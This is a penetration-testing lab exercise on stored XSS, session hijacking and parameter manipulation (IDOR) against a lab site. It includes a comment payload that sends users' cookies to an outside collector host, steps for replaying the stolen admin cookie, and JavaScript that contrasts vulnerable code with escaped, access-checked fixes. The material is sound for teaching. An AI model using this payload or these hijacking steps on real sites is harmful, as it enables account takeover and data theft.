Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities
Scenario
Stored attacks are those in which the injected script is permanently stored on the target server, for example in a database, message forum, visitor log, or comment field. The victim then retrieves the malicious script from the server whenever it requests the stored information. Stored cross-site scripting attacks are persistent: the script remains on the target server until it is detected and removed. When an employee of an organization unknowingly triggers such a script, the attacker obtains the session ID associated with that employee and can take over the session without ever logging in to the web application. As an ethical hacker or penetration tester, you need to safeguard the website from executing such scripts and thereby protect user sessions from being stolen.
The objective of this lab is to help students learn how to:
- Test web applications for vulnerabilities
- Use Firebug to hijack a session
Lab Duration: 30 Minutes
- Click Windows 8.1 (External Network) and press Ctrl+Alt+Delete.
- In the password field, type Pa$$w0rd and press Enter.
- Launch Firefox web browser, type the URL http://www.moviescope.com in the address bar and press Enter.
moviescope login/home page will appear as shown in the screenshot.
- Log in to MovieScope assuming that you are a user. Use the following credentials to log in to the website:
Username: steve
Password: test
- You are logged in as a general user and note that you do not have any admin privileges. Click on Blog tab.
- The Blog page appears; scroll down to the Leave a Comment section, enter the following payload in the Comment field and click Submit Comment.
<a onclick="document.location='http://www.oceanplaza.com/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>
- A comment containing the link text "Please click here to visit website" is posted (this is the text inside the <a> element of the payload submitted in the previous step).
Now, whenever a logged-in user visits this page (the Blog webpage) and clicks the link, the onclick handler behind it runs in that user's browser: it reads document.cookie and sends the value to http://www.oceanplaza.com/Default.aspx as a query parameter, where it is immediately written to a file named Mycookies.txt in the location C:\inetpub\wwwroot\oceanplaza\CookieSteal.
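How the stored payload behaves end to end, as an added example that is not part of the lab or of the MovieScope application: rendering the stored comment with and without HTML escaping, building the exfiltration URL the onclick handler requests, and recovering the session cookie on the collecting side. The payload string is the one entered above; the function names, the sample cookie value and the use of encodeURIComponent in place of the lab's escape() are assumptions of this example.

```javascript
// Added example (not the lab's or MovieScope's code). The comment payload is
// the one from the lab; function names and the sample cookie are constructed.

const PAYLOAD =
  '<a onclick="document.location=\'http://www.oceanplaza.com/Default.aspx?cookie=\'+escape(document.cookie);" href="#"> Please click here to visit website </a>';

// Vulnerable rendering: the stored comment is concatenated into the page as-is,
// so the <a onclick=...> markup becomes live DOM and the handler runs on click.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened rendering: encode the five characters that carry meaning in HTML,
// so the browser displays the text of the payload instead of parsing it.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Does the rendered HTML still contain a tag with an inline event handler?
// That is exactly what the payload needs in order to execute.
function containsInlineHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// What the handler does in the victim's browser: the cookie string is placed
// in the query string of a request to the attacker's collector (assumed URL).
function buildExfilUrl(cookieString, collector = 'http://www.oceanplaza.com/Default.aspx') {
  return `${collector}?cookie=${encodeURIComponent(cookieString)}`;
}

// What the collector does with the request: pull the cookie parameter back out
// and isolate the session cookie (mscope, per the lab) from anything else sent.
function extractSessionCookie(requestUrl, name = 'mscope') {
  const cookieParam = new URL(requestUrl).searchParams.get('cookie');
  if (cookieParam === null) return null;
  for (const pair of cookieParam.split(';')) {
    const [k, ...v] = pair.trim().split('=');
    if (k === name) return v.join('=');
  }
  return null;
}

// Constructed sample cookie header; the real value in Mycookies.txt is whatever
// the server issued to the admin session.
const SAMPLE_COOKIE = 'mscope=1jb6WoE4yYQHUjvvmXoEU6nZ; theme=dark';

console.log(renderCommentUnsafe(PAYLOAD));
console.log(renderCommentSafe(PAYLOAD));
console.log(buildExfilUrl(SAMPLE_COOKIE));
console.log(extractSessionCookie(buildExfilUrl(SAMPLE_COOKIE)));
```

The escaped rendering is the fix the lab's findings call for: the comment text is still shown to readers, but it no longer contains a tag the browser will execute, so the onclick handler never runs and nothing reaches the collector.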
- Click Windows Server Subnet C and click Ctrl+Alt+Delete.
- In the login window, enter the following credentials and press Enter:
User Name: Administrator
Password: Pa$$w0rd
- Click on Close button at the top right corner of the Server Manager window.
- Launch Firefox browser, type the URL http://www.moviescope.com in the address bar and press Enter.
moviescope login/home page appears as shown in the screenshot.
- Assume that you are the admin user and log in to the website using the following credentials:
Username: sam
Password: test
- You are logged in as an admin user and you can notice that the webpage displays your role (Admin) adjacent to Logout. Click on Blog tab:
- Blog webpage appears on the browser window. Scroll down the page and click Please click here to visit website link.
- The admin (victim) is redirected to the Default.aspx webpage of the oceanplaza website. Click the here link.
In a real attack, a user who sees a blank or unavailable page simply clicks the here link to return to the previous page, unaware that their cookie has just been stolen.
- You will be redirected to the Blog webpage of moviescope website as shown in the screenshot.
Do not log out of the website as long as you perform this lab.
- Click Windows 8.1 (External Network).
- Minimize the web browser, navigate to the location C:\inetpub\wwwroot\oceanplaza\CookieSteal and double-click the Mycookies.txt file.
- The text file contains cookies of the target user's authenticated session as shown in the screenshot.
- Switch to the web browser and click the View Profile tab. Note that steve is a normal user (here, you) and not an admin.
- You will observe that steve's profile is displayed on the webpage. Now, click the Firebug icon located at the top-right corner of the browser window.
- The Firebug panel appears at the lower end of the screen; click the Cookies tab and then click the Enable link.
- You will see a list of cookies. The value you need to change belongs to the cookie whose Expires column reads Session, i.e. the session cookie.
- Right-click mscope link and select Edit.
- As already mentioned, an Edit Cookie pop-up appears; and cookie name (mscope) is constant for the website. Enter the cookie value that you have observed in Mycookies.txt file and click OK.
- The cookie value is changed as shown in the screenshot.
- Now, refresh the web page and then click the power button at the right corner of the Firebug panel to de-activate the Firebug add-on.
- You will observe that the user name has changed to sam (admin) and you have logged in to his session. Click View Profile tab.
- The profile of sam appears as shown in the screenshot.
- In Sam's profile page, you will observe that the value of ID in the address bar is 1.
Now, try to change the parameter to id=2 in the address bar, and press Enter.
You will get the profile for John without needing any SQL injection technique to explore the database.
- Now, change the parameter to id=3 in the address bar and press Enter.
You will get the profile for kety.
This way, you can attempt to change the id number and obtain user profile information.
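The lookup behind the profile page, as an added example that is not part of the lab or of the MovieScope application: one version trusts the id parameter exactly as the lab observes, the other checks that the id belongs to the session's own user (or that the caller is an admin according to server-side state). The user and session tables are constructed for the example; only ids 1 to 3 and the names sam, john and kety follow the lab, and steve's id of 4 is assumed.

```javascript
// Added example (not the lab's or MovieScope's code). Tables are constructed;
// ids 1-3 and their names follow the lab, steve's id of 4 is assumed.

const USERS = {
  1: { name: 'sam', role: 'admin', email: 'sam@example.invalid' },
  2: { name: 'john', role: 'user', email: 'john@example.invalid' },
  3: { name: 'kety', role: 'user', email: 'kety@example.invalid' },
  4: { name: 'steve', role: 'user', email: 'steve@example.invalid' },
};

// Session cookie value -> user id. Constructed values; the first stands in for
// the admin cookie recovered from Mycookies.txt, the second for steve's own.
const STOLEN_ADMIN_COOKIE = '1jb6WoE4yYQHUjvvmXoEU6nZ';
const STEVE_COOKIE = 'q8dLsKx0Pvm3Yt9RaZcWbN7e';
const SESSIONS = {
  [STOLEN_ADMIN_COOKIE]: 1,
  [STEVE_COOKIE]: 4,
};

// Resolve the session cookie to the user the server believes is logged in.
function currentUser(cookieValue) {
  const id = SESSIONS[cookieValue];
  return id === undefined ? null : { id, ...USERS[id] };
}

// Vulnerable: requires a valid session, then returns whichever profile the
// id parameter names. This is the behaviour the lab exploits with id=2, id=3.
function viewProfileUnsafe(cookieValue, idParam) {
  if (!currentUser(cookieValue)) return { status: 401 };
  const profile = USERS[Number(idParam)];
  return profile ? { status: 200, profile } : { status: 404 };
}

// Hardened: the id must match the session's own user, or the caller must be an
// admin (role taken from the server-side record, never from the request).
// Foreign and unknown ids both get 404 so the endpoint does not reveal which
// ids exist.
function viewProfileSafe(cookieValue, idParam) {
  const me = currentUser(cookieValue);
  if (!me) return { status: 401 };
  const id = Number(idParam);
  if (!Number.isInteger(id)) return { status: 400 };
  if (id !== me.id && me.role !== 'admin') return { status: 404 };
  const profile = USERS[id];
  return profile ? { status: 200, profile } : { status: 404 };
}

// Walk the id parameter the way the lab does and report what each handler leaks.
function enumerateProfiles(handler, cookieValue, maxId = 5) {
  const leaked = [];
  for (let id = 1; id <= maxId; id++) {
    const r = handler(cookieValue, String(id));
    if (r.status === 200) leaked.push(`${id}:${r.profile.name}`);
  }
  return leaked;
}

console.log('unsafe, steve:', enumerateProfiles(viewProfileUnsafe, STEVE_COOKIE));
console.log('safe, steve:  ', enumerateProfiles(viewProfileSafe, STEVE_COOKIE));
console.log('safe, stolen admin cookie:', enumerateProfiles(viewProfileSafe, STOLEN_ADMIN_COOKIE));
```

Note that the hardened handler still returns every profile to the hijacked admin session, because authorization is evaluated against whichever session the server believes it is talking to. Fixing the id check does not undo the cookie theft, and fixing the XSS does not remove the id check problem; the lab's three findings need three separate fixes.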
- In this lab, it is evident that:
- The website is vulnerable to stored XSS: the comment is stored and rendered without output encoding, so markup inside it executes in other users' browsers
- The session cookie (mscope) is readable by script through document.cookie, is sent in plain text, and its value alone is enough to take over the session, so anyone who obtains it is logged in as the victim
- The website does not check that the id parameter belongs to the logged-in user, so profiles can be enumerated simply by changing it (parameter manipulation, an insecure direct object reference)
In this lab, you have learned how to:
- Test web applications for vulnerabilities
- Use Firebug to hijack a session